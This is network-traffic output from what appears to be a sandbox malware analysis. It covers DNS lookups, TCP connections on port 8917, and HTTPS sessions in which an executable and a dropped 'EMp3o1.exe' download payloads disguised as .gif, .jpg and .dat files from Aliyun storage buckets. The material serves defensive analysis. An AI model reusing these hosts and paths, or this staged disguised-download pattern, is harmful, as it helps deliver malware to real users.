                                              Jan 5, 2025 10:13:31.796749115 CET628018917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.320012093 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.325000048 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:32.325154066 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.516525984 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:32.521496058 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.437649012 CET8917628028.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.437791109 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.437896967 CET628028917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.944503069 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:34.949644089 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:34.949723005 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:35.141974926 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:35.146820068 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.007848024 CET8917628038.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.007965088 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.008069992 CET628038917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.522749901 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.527735949 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:37.527832985 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.750677109 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:37.755518913 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:39.627378941 CET8917628048.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:39.627523899 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:39.627753973 CET628048917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.132335901 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.137275934 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:40.137377024 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.322566032 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:40.327446938 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.218607903 CET8917628058.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.218677998 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.218811035 CET628058917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.725975990 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.730951071 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:42.731069088 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.987551928 CET628068917192.168.2.68.217.47.169
                                              Jan 5, 2025 10:13:42.992537975 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:44.792596102 CET8917628068.217.47.169192.168.2.6
                                              Jan 5, 2025 10:13:44.792665958 CET628068917192.168.2.68.217.47.169
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 5, 2025 10:11:06.450802088 CET5350162162.159.36.2192.168.2.6
                                              Jan 5, 2025 10:11:06.915935040 CET5031153192.168.2.61.1.1.1
                                              Jan 5, 2025 10:11:06.923161983 CET53503111.1.1.1192.168.2.6
                                              Jan 5, 2025 10:11:19.339256048 CET5430853192.168.2.61.1.1.1
                                              Jan 5, 2025 10:11:19.992727041 CET53543081.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:14.117712975 CET5966653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:14.797923088 CET53596661.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:52.246855021 CET5426353192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:52.256486893 CET53542631.1.1.1192.168.2.6
                                              Jan 5, 2025 10:12:58.288768053 CET5889553192.168.2.61.1.1.1
                                              Jan 5, 2025 10:12:58.346003056 CET53588951.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:04.366784096 CET5568653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:04.397310019 CET53556861.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:10.429404020 CET5075553192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:10.459749937 CET53507551.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:16.491738081 CET5436253192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:16.501750946 CET53543621.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:22.523117065 CET6400853192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:22.533145905 CET53640081.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:28.554100990 CET5056153192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:28.563180923 CET53505611.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:34.585477114 CET6179753192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:34.592746019 CET53617971.1.1.1192.168.2.6
                                              Jan 5, 2025 10:13:40.619319916 CET6387653192.168.2.61.1.1.1
                                              Jan 5, 2025 10:13:40.628900051 CET53638761.1.1.1192.168.2.6
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| Jan 5, 2025 10:11:06.915935040 CET | 192.168.2.6 | 1.1.1.1 | 0x5968 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Jan 5, 2025 10:11:19.339256048 CET | 192.168.2.6 | 1.1.1.1 | 0xa740 | Standard query (0) | msd1sq.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:12:14.117712975 CET | 192.168.2.6 | 1.1.1.1 | 0xb4dc | Standard query (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:12:52.246855021 CET | 192.168.2.6 | 1.1.1.1 | 0x51b0 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:12:58.288768053 CET | 192.168.2.6 | 1.1.1.1 | 0x63cc | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:04.366784096 CET | 192.168.2.6 | 1.1.1.1 | 0xd285 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:10.429404020 CET | 192.168.2.6 | 1.1.1.1 | 0xe10 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:16.491738081 CET | 192.168.2.6 | 1.1.1.1 | 0x6b61 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:22.523117065 CET | 192.168.2.6 | 1.1.1.1 | 0x3ca9 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:28.554100990 CET | 192.168.2.6 | 1.1.1.1 | 0xc4c3 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:34.585477114 CET | 192.168.2.6 | 1.1.1.1 | 0xa69a | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 10:13:40.619319916 CET | 192.168.2.6 | 1.1.1.1 | 0x4f34 | Standard query (0) | cvqthu.net | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 10:11:06.923161983 CET | 1.1.1.1 | 192.168.2.6 | 0x5968 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 5, 2025 10:11:19.992727041 CET | 1.1.1.1 | 192.168.2.6 | 0xa740 | No error (0) | msd1sq.oss-cn-beijing.aliyuncs.com | sc-257a.cn-beijing.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 5, 2025 10:11:19.992727041 CET | 1.1.1.1 | 192.168.2.6 | 0xa740 | No error (0) | sc-257a.cn-beijing.oss-adns.aliyuncs.com | sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 5, 2025 10:11:19.992727041 CET | 1.1.1.1 | 192.168.2.6 | 0xa740 | No error (0) | sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | | 39.103.20.34 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:12:14.797923088 CET | 1.1.1.1 | 192.168.2.6 | 0xb4dc | No error (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 5, 2025 10:12:14.797923088 CET | 1.1.1.1 | 192.168.2.6 | 0xb4dc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 5, 2025 10:12:14.797923088 CET | 1.1.1.1 | 192.168.2.6 | 0xb4dc | No error (0) | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | | 118.178.60.9 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:12:52.256486893 CET | 1.1.1.1 | 192.168.2.6 | 0x51b0 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:12:58.346003056 CET | 1.1.1.1 | 192.168.2.6 | 0x63cc | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:04.397310019 CET | 1.1.1.1 | 192.168.2.6 | 0xd285 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:10.459749937 CET | 1.1.1.1 | 192.168.2.6 | 0xe10 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:16.501750946 CET | 1.1.1.1 | 192.168.2.6 | 0x6b61 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:22.533145905 CET | 1.1.1.1 | 192.168.2.6 | 0x3ca9 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:28.563180923 CET | 1.1.1.1 | 192.168.2.6 | 0xc4c3 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:34.592746019 CET | 1.1.1.1 | 192.168.2.6 | 0xa69a | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
Jan 5, 2025 10:13:40.628900051 CET | 1.1.1.1 | 192.168.2.6 | 0x4f34 | Name error (3) | cvqthu.net | none | none | A (IP address) | IN (0x0001) | false
                                              • msd1sq.oss-cn-beijing.aliyuncs.com
                                              • 22mm.oss-cn-hangzhou.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 62735 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 09:11:21 UTC | 111 | OUT | GET /i.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
2025-01-05 09:11:21 UTC | 557 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:21 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 512
                                              Connection: close
                                              x-oss-request-id: 677A4CB999F00D3935655483
                                              Accept-Ranges: bytes
                                              ETag: "7E4165B1411CF0914B7DB88CBD5C6A68"
                                              Last-Modified: Sat, 04 Jan 2025 09:23:34 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 6704561915333262350
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: fkFlsUEc8JFLfbiMvVxqaA==
                                              x-oss-server-time: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 62749 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 09:11:23 UTC | 111 | OUT | GET /a.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
2025-01-05 09:11:23 UTC | 545 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:23 GMT
                                              Content-Type: image/gif
                                              Content-Length: 135589
                                              Connection: close
                                              x-oss-request-id: 677A4CBBE48B2B31372090B9
                                              Accept-Ranges: bytes
                                              ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 8642451798640735006
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                              x-oss-server-time: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 62762 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 09:11:25 UTC | 111 | OUT | GET /b.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
2025-01-05 09:11:25 UTC | 546 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:25 GMT
                                              Content-Type: image/gif
                                              Content-Length: 125333
                                              Connection: close
                                              x-oss-request-id: 677A4CBD35EB263636986A44
                                              Accept-Ranges: bytes
                                              ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:48 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 10333201072197591521
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                              x-oss-server-time: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 62774 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 09:11:27 UTC | 111 | OUT | GET /c.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
2025-01-05 09:11:28 UTC | 546 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:27 GMT
                                              Content-Type: image/gif
                                              Content-Length: 10681
                                              Connection: close
                                              x-oss-request-id: 677A4CBF7A62AC31309C0E73
                                              Accept-Ranges: bytes
                                              ETag: "10A818386411EE834D99AE6B7B68BE71"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 10287299869673359293
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                              x-oss-server-time: 13


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.6 | 62775 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:11:29 UTC | 111 | OUT | GET /d.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:29 UTC | 547 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:29 GMT
                                              Content-Type: image/gif
                                              Content-Length: 3892010
                                              Connection: close
                                              x-oss-request-id: 677A4CC19932F13535F350C6
                                              Accept-Ranges: bytes
                                              ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:53 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 3363616613234190325
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                              x-oss-server-time: 25


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.6 | 62776 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:11:37 UTC | 111 | OUT | GET /s.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:38 UTC | 560 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:37 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 28272
                                              Connection: close
                                              x-oss-request-id: 677A4CC95A53BB303200AE91
                                              Accept-Ranges: bytes
                                              ETag: "85C558B2E6A863EF997650572603558A"
                                              Last-Modified: Sun, 05 Jan 2025 09:06:01 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 16094947486928981281
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: hcVYsuaoY++ZdlBXJgNVig==
                                              x-oss-server-time: 2


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.6 | 62777 | 39.103.20.34 | 443 | 2300 | C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:11:39 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:39 UTC | 543 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:39 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 8299
                                              Connection: close
                                              x-oss-request-id: 677A4CCBD4BE2031317E0BC7
                                              Accept-Ranges: bytes
                                              ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 692387538176721524
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                              x-oss-server-time: 6


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.6 | 62780 | 118.178.60.9 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:12:16 UTC | 114 | OUT | GET /drops.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:16 UTC | 546 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:16 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 37274
                                              Connection: close
                                              x-oss-request-id: 677A4CF094C77F373199EDCA
                                              Accept-Ranges: bytes
                                              ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                              Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 9193697774326766004
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                              x-oss-server-time: 10


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.6 | 62781 | 118.178.60.9 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:12:19 UTC | 110 | OUT | GET /f.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:20 UTC | 558 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:19 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 879
                                              Connection: close
                                              x-oss-request-id: 677A4CF33849223538084E39
                                              Accept-Ranges: bytes
                                              ETag: "E54C4296F011EC91D935AA353C936E34"
                                              Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 11142793972884948456
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                              x-oss-server-time: 6


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.6 | 62782 | 118.178.60.9 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:12:21 UTC | 115 | OUT | GET /FOM-50.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:21 UTC | 546 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:21 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 55085
                                              Connection: close
                                              x-oss-request-id: 677A4CF5F947FB3032E3B694
                                              Accept-Ranges: bytes
                                              ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                              Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 12339968747348072397
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                              x-oss-server-time: 4


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.6 | 62783 | 118.178.60.9 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2025-01-05 09:12:23 UTC | 115 | OUT | GET /FOM-51.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:23 UTC | 548 | IN | HTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:23 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 4859125
                                              Connection: close
                                              x-oss-request-id: 677A4CF7DF727131332F097C
                                              Accept-Ranges: bytes
                                              ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                              Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 9060732723227198118
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                              x-oss-server-time: 14
                                              Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                              2025-01-05 09:12:23 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                              Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                              2025-01-05 09:12:23 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                              Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                              2025-01-05 09:12:23 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                              Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.6 | 62784 | 118.178.60.94 | 443 | 6032 | C:\Users\user\Documents\EMp3o1.exe
                                              Timestamp | Bytes transferred | Direction | Data
